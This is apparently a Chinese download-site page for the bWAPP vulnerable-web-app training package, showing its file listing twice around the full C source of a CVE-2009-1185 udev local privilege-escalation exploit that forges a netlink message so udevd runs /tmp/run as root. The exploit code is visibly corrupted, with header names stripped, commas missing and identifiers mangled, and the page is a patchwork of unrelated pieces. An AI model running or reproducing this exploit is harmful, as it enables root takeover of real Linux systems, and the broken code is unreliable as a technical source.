bwapp官方最新版本
代码片段和文件信息
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
文件 2602 2014-09-27 18:16 apache2default
文件 226 2013-12-17 00:04 apache2httpd.conf
文件 112 2014-03-08 15:05 bWAPP666
目录 0 2014-03-17 04:20 bWAPPadmin
文件 4471 2014-09-27 17:58 bWAPPadminindex.php
文件 645 2014-05-01 21:51 bWAPPadminphpinfo.php
文件 2229 2014-09-27 17:59 bWAPPadminsettings.php
文件 2093 2014-05-11 00:27 bWAPPaim.php
目录 0 2014-05-11 02:44 bWAPPapps
文件 55719 2014-05-11 02:41 bWAPPappsmovie_search
文件 6623 2014-09-27 01:57 bWAPPa_captcha_bypass.php
文件 10033 2014-09-27 01:57 bWAPPa_forgotten.php
文件 1208 2014-05-01 21:51 bWAPPa_insecure_login.php
文件 7551 2014-09-27 01:57 bWAPPa_insecure_login_1.php
文件 9338 2014-09-27 01:57 bWAPPa_insecure_login_2.php
文件 7471 2014-09-27 01:57 bWAPPa_insecure_login_3.php
文件 4848 2014-09-27 01:57 bWAPPa_logout.php
文件 1737 2014-05-18 20:56 bWAPPa_logout_1.php
文件 1200 2014-05-01 21:51 bWAPPa_pwd_attacks.php
文件 7524 2014-09-27 01:57 bWAPPa_pwd_attacks_1.php
文件 7914 2014-09-27 01:57 bWAPPa_pwd_attacks_2.php
文件 8212 2014-09-27 01:57 bWAPPa_pwd_attacks_3.php
文件 8039 2014-09-27 01:57 bWAPPa_pwd_attacks_4.php
文件 5894 2014-09-27 01:57 bWAPPa_weak_pwd.php
文件 732 2014-03-29 20:04 bWAPPackdoor.php
文件 5907 2014-09-27 01:57 bWAPPof_1.php
文件 4804 2014-09-27 01:57 bWAPPof_2.php
文件 7858 2014-11-02 22:57 bWAPPugs.txt
文件 1821 2014-05-01 21:51 bWAPPcaptcha.php
文件 1101 2014-05-01 21:51 bWAPPcaptcha_box.php
文件 5941 2014-09-27 01:57 bWAPPclickjacking.php
............此处省略265个文件信息
/*
* cve-2009-1185.c
*
* udev < 141 Local Privilege Escalation Exploit
* Jon Oberheide
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
*
* udev before 1.4.1 does not verify whether a NETlink message originates
* from kernel space which allows local users to gain privileges by sending
* a NETlink message from user space.
*
* Notes:
*
* An alternate version of kcope‘s exploit. This exploit leverages the
* 95-udev-late.rules functionality that is meant to run arbitrary commands
* when a device is removed. A bit cleaner and reliable as long as your
* distro ships that rule file.
*
* Tested on Gentoo Intrepid and Jaunty.
*
* Usage:
*
* Pass the PID of the udevd netlink socket (listed in /proc/net/netlink
* usually is the udevd PID minus 1) as argv[1].
*
* The exploit will execute /tmp/run as root so throw whatever payload you
* want in there.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include nk.h>
#ifndef NETlink_Kobject_UEVENT
#define NETlink_Kobject_UEVENT 15
#endif
int
main(int argc char **argv)
{
int sock;
char *mp *err;
char message[4096];
struct stat st;
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;
if (argc < 2) {
err = “Pass the udevd netlink PID as an argument“;
printf(“[-] Error: %s
“ err);
exit(1);
}
if ((stat(“/etc/udev/rules.d/95-udev-late.rules“ &st) == -1) &&
(stat(“/lib/udev/rules.d/95-udev-late.rules“ &st) == -1)) {
err = “Required 95-udev-late.rules not found“;
printf(“[-] Error: %s
“ err);
exit(1);
}
if (stat(“/tmp/run“ &st) == -1) {
err = “/tmp/run does not exist please create it“;
printf(“[-] Error: %s
“ err);
exit(1);
}
system(“chmod +x /tmp/run“);
memset(&address 0 sizeof(address));
address.nl_family = AF_NETlink;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETlink SOCK_DGRAM NETlink_Kobject_UEVENT);
bind(sock (struct sockaddr *) &address sizeof(address));
mp = message;
mp += sprintf(mp “remove@/d“) + 1;
mp += sprintf(mp “SUBSYSTEM=block“) + 1;
mp += sprintf(mp “DEVPATH=/dev/foo“) + 1;
mp += sprintf(mp “TIMEOUT=10“) + 1;
mp += sprintf(mp “ACTION=remove“) +1;
mp += sprintf(mp “REMOVE_CMD=/tmp/run“) +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock &msg 0);
close(sock);
return 0;
}
// milw0rm.com [2009-04-30]
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
文件 2602 2014-09-27 18:16 apache2default
文件 226 2013-12-17 00:04 apache2httpd.conf
文件 112 2014-03-08 15:05 bWAPP666
目录 0 2014-03-17 04:20 bWAPPadmin
文件 4471 2014-09-27 17:58 bWAPPadminindex.php
文件 645 2014-05-01 21:51 bWAPPadminphpinfo.php
文件 2229 2014-09-27 17:59 bWAPPadminsettings.php
文件 2093 2014-05-11 00:27 bWAPPaim.php
目录 0 2014-05-11 02:44 bWAPPapps
文件 55719 2014-05-11 02:41 bWAPPappsmovie_search
文件 6623 2014-09-27 01:57 bWAPPa_captcha_bypass.php
文件 10033 2014-09-27 01:57 bWAPPa_forgotten.php
文件 1208 2014-05-01 21:51 bWAPPa_insecure_login.php
文件 7551 2014-09-27 01:57 bWAPPa_insecure_login_1.php
文件 9338 2014-09-27 01:57 bWAPPa_insecure_login_2.php
文件 7471 2014-09-27 01:57 bWAPPa_insecure_login_3.php
文件 4848 2014-09-27 01:57 bWAPPa_logout.php
文件 1737 2014-05-18 20:56 bWAPPa_logout_1.php
文件 1200 2014-05-01 21:51 bWAPPa_pwd_attacks.php
文件 7524 2014-09-27 01:57 bWAPPa_pwd_attacks_1.php
文件 7914 2014-09-27 01:57 bWAPPa_pwd_attacks_2.php
文件 8212 2014-09-27 01:57 bWAPPa_pwd_attacks_3.php
文件 8039 2014-09-27 01:57 bWAPPa_pwd_attacks_4.php
文件 5894 2014-09-27 01:57 bWAPPa_weak_pwd.php
文件 732 2014-03-29 20:04 bWAPPackdoor.php
文件 5907 2014-09-27 01:57 bWAPPof_1.php
文件 4804 2014-09-27 01:57 bWAPPof_2.php
文件 7858 2014-11-02 22:57 bWAPPugs.txt
文件 1821 2014-05-01 21:51 bWAPPcaptcha.php
文件 1101 2014-05-01 21:51 bWAPPcaptcha_box.php
文件 5941 2014-09-27 01:57 bWAPPclickjacking.php
............此处省略265个文件信息
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件举报,一经查实,本站将立刻删除。
评论列表(条)